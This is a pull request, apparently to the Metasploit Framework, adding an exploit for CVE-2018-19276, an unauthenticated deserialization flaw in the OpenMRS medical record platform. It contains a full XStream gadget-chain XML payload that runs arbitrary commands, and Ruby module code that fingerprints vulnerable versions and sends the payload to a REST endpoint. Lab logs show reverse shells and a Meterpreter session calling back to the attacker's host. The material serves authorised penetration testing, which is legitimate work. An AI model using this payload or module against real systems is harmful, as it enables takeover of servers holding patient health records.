### PR TITLE
Add OpenMRS deserialization exploit

### DIFF
--- a/data/exploits/CVE-2018-19276/payload.erb
+++ b/data/exploits/CVE-2018-19276/payload.erb
@@ -1,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>

--- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md
+++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md
@@ -32,7 +32,7 @@
 
 ## Scenarios
 
-### Version of software and OS as applicable
+### OpenMRS Platform `v2.1.2`
 
   ```
   msf5 > use exploit/multi/http/openmrs_deserialization 

--- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md
+++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md
@@ -29,35 +29,27 @@
 ### OpenMRS Platform `v2.1.2`
 
   ```
-  msf5 > use exploit/multi/http/openmrs_deserialization 
-  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
-  rhosts => 192.168.37.168
+  msf5 > use exploit/multi/http/openmrs_deserialization
+  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.176
+  rhosts => 192.168.37.176
   msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
   targeturi => /openmrs-standalone
-  msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
-  lhost => 192.168.37.1
   msf5 exploit(multi/http/openmrs_deserialization) > check
-  [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
+  [*] 192.168.37.176:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
   msf5 exploit(multi/http/openmrs_deserialization) > run
 
-  [*] Started reverse TCP double handler on 192.168.37.1:4444 
+  [*] Started reverse TCP handler on 192.168.37.1:4444
   [*] Target is running OpenMRS
-  [*] Formatting payload
   [*] Sending payload...
-  [*] Accepted the first client connection...
-  [*] Accepted the second client connection...
-  [*] Command: echo wKYK4x9ZOHJ37tm7;
-  [*] Writing to socket A
-  [*] Writing to socket B
-  [*] Reading from sockets...
-  [*] Reading from socket B
-  [*] B: "wKYK4x9ZOHJ37tm7\r\n"
-  [*] Matching...
-  [*] A is input...
-  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600
+  [*] Sending stage (3021284 bytes) to 192.168.37.176
+  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.176:47056) at 2019-12-04 12:18:50 -0600
 
-  whoami
-  space
-  id
-  uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
+  meterpreter > getuid
+  Server username: uid=1000, gid=1000, euid=1000, egid=1000
+  meterpreter > sysinfo
+  Computer     : 192.168.37.176
+  OS           : Ubuntu 18.04 (Linux 5.0.0-36-generic)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
   ```

--- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md
+++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md
@@ -24,12 +24,6 @@
   6. Do: ```run```
   7. You should get a shell.
 
-## Options
-
-  **ForceExploit**
-
-  Overrides the check result and runs the exploit.
-
 ## Scenarios
 
 ### OpenMRS Platform `v2.1.2`

--- a/documentation/modules/exploit/multi/http/openmrs_deserialization.md
+++ b/documentation/modules/exploit/multi/http/openmrs_deserialization.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+  OpenMRS is an open-source platform that supplies
+  users with a customizable medical record system.
+
+  There exists an object deserialization vulnerability
+  in the `webservices.rest` module used in OpenMRS Platform
+  for versions below `v2.24.0`. Unauthenticated remote code
+  execution can be achieved by sending a malicious XML payload
+  to a Rest API endpoint such as `/ws/rest/v1/concept`.
+
+  Vulnerable versions of the software can be found [here](https://sourceforge.net/projects/openmrs/files/releases/).
+
+  Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+  8 and Java 9.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/openmrs_deserialization```
+  4. Do: ```set TARGETURI <uri>```
+  5. Do: ```set RHOSTS <ip>```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+  **ForceExploit**
+
+  Overrides the check result and runs the exploit.
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+  ```
+  msf5 > use exploit/multi/http/openmrs_deserialization 
+  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
+  rhosts => 192.168.37.168
+  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
+  targeturi => /openmrs-standalone
+  msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/http/openmrs_deserialization) > check
+  [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
+  msf5 exploit(multi/http/openmrs_deserialization) > run
+
+  [*] Started reverse TCP double handler on 192.168.37.1:4444 
+  [*] Target is running OpenMRS
+  [*] Formatting payload
+  [*] Sending payload...
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [*] Command: echo wKYK4x9ZOHJ37tm7;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket B
+  [*] B: "wKYK4x9ZOHJ37tm7\r\n"
+  [*] Matching...
+  [*] A is input...
+  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600
+
+  whoami
+  space
+  id
+  uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
+  ```

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
        [
         [ '', { } ]
        ],
-      'DisclosureDate' => "Apr 1 2013",
+      'DisclosureDate' => "2019-02-04",
       'DefaultTarget'  => 0
     ))
 
@@ -42,8 +42,27 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
+
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.include?('OpenMRS')
+    response = res.get_html_document
+    version = response.at('body//h3')
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
+
+    version_no = version.text
+    version_no = version_no.match(/\d\.\d+\.\d*/)
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
+
+    version_no = Gem::Version.new(version_no)
+    not_vuln = Gem::Version.new('2.1.4')
+
+    return CheckCode::Appears("OpenMRS platform version: #{version_no}") if (version_no < not_vuln) && ![ Gem::Version.new('1.11.8'), Gem::Version.new('1.11.9') ].include?(version_no)
+
+    CheckCode::Detected
   end
 
   def exploit
+
   end
 end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -1,0 +1,49 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenMRS Java Deserialization RCE',
+      'Description'    => %q(
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nicola Serra', # Vuln Discovery and PoC
+        'mpgn',         # PoC
+        'Shelby Pace'   # Metasploit Module
+      ],
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Payload'        => { },
+      'Targets'        =>
+       [
+        [ '', { } ]
+       ],
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
+    ])
+  end
+
+  def check
+  end
+
+  def exploit
+  end
+end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -26,10 +26,17 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
-      'Payload'        => { },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
       'Targets'        =>
        [
-        [ '', { } ]
+         [ 'Linux',
+           {
+             'Arch'            =>  ARCH_CMD,
+             'Platform'        =>  'unix',
+             'Payload'         =>  'cmd/unix/reverse',
+           }
+         ]
        ],
       'DisclosureDate' => "2019-02-04",
       'DefaultTarget'  => 0
@@ -37,7 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
     [
-        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
+      Opt::RPORT(8081),
+      OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
     ])
   end
 
@@ -62,7 +70,52 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Detected
   end
 
-  def exploit
+  def format_payload
+    payload_data = xml_encode(payload.encoded)
+    payload_arr = payload_data.split(' ', 3)
 
+    formatted_payload = ''
+    payload_arr.each do |arg|
+      formatted_payload << "<string>#{arg}</string>"
+    end
+
+    formatted_payload.gsub!("'", "")
+  end
+
+  def read_payload_data(payload_cmd)
+    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
+    payload_data = File.binread(erb_path)
+    payload_data = ERB.new(payload_data).result(binding)
+
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
+  end
+
+  def send_exploit
+    xml_data = format_payload
+    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
+    payload_data = read_payload_data(xml_data)
+
+    print_status('Sending payload...')
+    send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  rest_uri,
+      'headers'   =>  { 'Content-Type'  =>  'text/xml' },
+      'data'      =>  payload_data
+    )
+  end
+
+  def xml_encode(str)
+    str.gsub!(/&/, '&amp;')
+    str.gsub!(/</, '&lt;')
+    str.gsub!(/>/, '&gt;')
+  end
+
+  def exploit
+    chk_status = check
+    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless (chk_status == CheckCode::Appears || chk_status == CheckCode::Detected)
+    print_status('Target is running OpenMRS')
+
+    send_exploit
   end
 end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
 
     version_no = version.text
-    version_no = version_no.match(/\d\.\d+\.\d*/)
+    version_no = version_no.match(/\d+\.\d+\.\d*/)
     return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
 
     version_no = Gem::Version.new(version_no)

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
            }
          ]
        ],
-      'DisclosureDate' => "2019-02-04",
+      'DisclosureDate' => '2019-02-04',
       'DefaultTarget'  => 0
     ))
 
@@ -88,7 +88,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def format_payload
-    payload_data = xml_encode(payload.encoded)
+    payload_data = payload.encoded
+    payload_data = payload_data.encode(xml: :text)
     payload_arr = payload_data.split(' ', 3)
 
     formatted_payload = ''
@@ -122,12 +123,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers'   =>  { 'Content-Type'  =>  'text/xml' },
       'data'      =>  payload_data
     )
-  end
-
-  def xml_encode(str)
-    str.gsub!(/&/, '&amp;')
-    str.gsub!(/</, '&lt;')
-    str.gsub!(/>/, '&gt;')
   end
 
   def exploit

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -12,18 +12,33 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'OpenMRS Java Deserialization RCE',
       'Description'    => %q(
+        OpenMRS is an open-source platform that supplies
+        users with a customizable medical record system.
+
+        There exists an object deserialization vulnerability
+        in the `webservices.rest` module used in OpenMRS Platform.
+        Unauthenticated remote code execution can be achieved
+        by sending a malicious XML payload to a Rest API endpoint
+        such as `/ws/rest/v1/concept`.
+
+        This module uses an XML payload generated with Marshalsec
+        that targets the ImageIO component of the XStream library.
+
+        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+        8 and Java 9.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>
       [
-        'Nicola Serra', # Vuln Discovery and PoC
-        'mpgn',         # PoC
-        'Shelby Pace'   # Metasploit Module
+        'Nicolas Serra', # Vuln Discovery and PoC
+        'mpgn',          # PoC
+        'Shelby Pace'    # Metasploit Module
       ],
       'References'     =>
        [
          [ 'CVE', '2018-19276' ],
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
       'Platform'       => 'unix',
@@ -47,13 +62,15 @@ class MetasploitModule < Msf::Exploit::Remote
       Opt::RPORT(8081),
       OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
     ])
+
+    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
   end
 
   def check
     res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
     return CheckCode::Unknown("OpenMRS page unreachable.") unless res
 
-    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.include?('OpenMRS')
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
     response = res.get_html_document
     version = response.at('body//h3')
     return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
@@ -75,6 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_arr = payload_data.split(' ', 3)
 
     formatted_payload = ''
+    print_status('Formatting payload')
     payload_arr.each do |arg|
       formatted_payload << "<string>#{arg}</string>"
     end
@@ -83,6 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def read_payload_data(payload_cmd)
+    # payload generated with Marshalsec
     erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
     payload_data = File.binread(erb_path)
     payload_data = ERB.new(payload_data).result(binding)
@@ -113,8 +132,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     chk_status = check
-    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless (chk_status == CheckCode::Appears || chk_status == CheckCode::Detected)
-    print_status('Target is running OpenMRS')
+    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
+    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
 
     send_exploit
   end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Appears("OpenMRS platform version: #{version_no}") if (version_no < not_vuln) && ![ Gem::Version.new('1.11.8'), Gem::Version.new('1.11.9') ].include?(version_no)
 
-    CheckCode::Detected
+    CheckCode::Safe
   end
 
   def format_payload

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -80,9 +80,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
 
     version_no = Gem::Version.new(version_no)
-    not_vuln = Gem::Version.new('2.1.4')
 
-    return CheckCode::Appears("OpenMRS platform version: #{version_no}") if (version_no < not_vuln) && ![ Gem::Version.new('1.11.8'), Gem::Version.new('1.11.9') ].include?(version_no)
+    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
+      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
+    end
 
     CheckCode::Safe
   end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -41,15 +42,15 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
+      'Platform'       => [ 'unix', 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
        [
          [ 'Linux',
            {
-             'Arch'            =>  ARCH_CMD,
-             'Platform'        =>  'unix',
-             'Payload'         =>  'cmd/unix/reverse',
+             'Arch'             =>  [ ARCH_X86, ARCH_X64 ],
+             'Platform'         =>  [ 'unix', 'linux' ],
+             'CmdStagerFlavor'  => 'printf'
            }
          ]
        ],
@@ -104,12 +105,12 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
   end
 
-  def send_exploit
-    xml_data = format_payload
+  def execute_command(cmd, opts={})
+    cmd = cmd.encode(xml: :text)
+    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
     rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
     payload_data = read_payload_data(xml_data)
 
-    print_status('Sending payload...')
     send_request_cgi(
       'method'    =>  'POST',
       'uri'       =>  rest_uri,
@@ -121,8 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     chk_status = check
     print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears
-    fail_with(Failure::NoTarget, 'Target is not vulnerable') unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
+    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] )
+      fail_with(Failure::NoTarget, 'Target is not vulnerable')
+    end
 
-    send_exploit
+    cmds = generate_cmdstager(:concat_operator => '&&')
+    print_status('Sending payload...')
+    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
   end
 end

--- a/modules/exploits/multi/http/openmrs_deserialization.rb
+++ b/modules/exploits/multi/http/openmrs_deserialization.rb
@@ -88,17 +88,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def format_payload
-    payload_data = payload.encoded
-    payload_data = payload_data.encode(xml: :text)
+    payload_data = payload.encoded.to_s.encode(xml: :text)
     payload_arr = payload_data.split(' ', 3)
-
-    formatted_payload = ''
-    print_status('Formatting payload')
-    payload_arr.each do |arg|
-      formatted_payload << "<string>#{arg}</string>"
-    end
-
-    formatted_payload.gsub!("'", "")
+    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
   end
 
   def read_payload_data(payload_cmd)


### PR DESCRIPTION
OpenMRS is an open-source platform that supplies users with a customizable medical record system.

There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform for versions below `v2.24.0`. Unauthenticated remote code
execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`.

## Verification

- [x] Install the application
- [x] Start msfconsole
- [x] Do: ```use exploit/multi/http/openmrs_deserialization```
- [x] Do: ```set TARGETURI <uri>```
- [x] Do: ```set RHOSTS <ip>```
- [x] Do: ```run```
- [x] You should get a shell.

## Scenarios

```
  msf5 > use exploit/multi/http/openmrs_deserialization
  msf5 exploit(multi/http/openmrs_deserialization) > set rhosts 192.168.37.168
  rhosts => 192.168.37.168
  msf5 exploit(multi/http/openmrs_deserialization) > set targeturi /openmrs-standalone
  targeturi => /openmrs-standalone
  msf5 exploit(multi/http/openmrs_deserialization) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/http/openmrs_deserialization) > check
  [*] 192.168.37.168:8081 - The target appears to be vulnerable. OpenMRS platform version: 2.1.2
  msf5 exploit(multi/http/openmrs_deserialization) > run

  [*] Started reverse TCP double handler on 192.168.37.1:4444
  [*] Target is running OpenMRS
  [*] Formatting payload
  [*] Sending payload...
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [*] Command: echo wKYK4x9ZOHJ37tm7;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket B
  [*] B: "wKYK4x9ZOHJ37tm7\r\n"
  [*] Matching...
  [*] A is input...
  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.168:45048) at 2019-11-21 14:13:09 -0600

  whoami
  space
  id
  uid=1000(space) gid=1000(space) groups=1000(space),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
```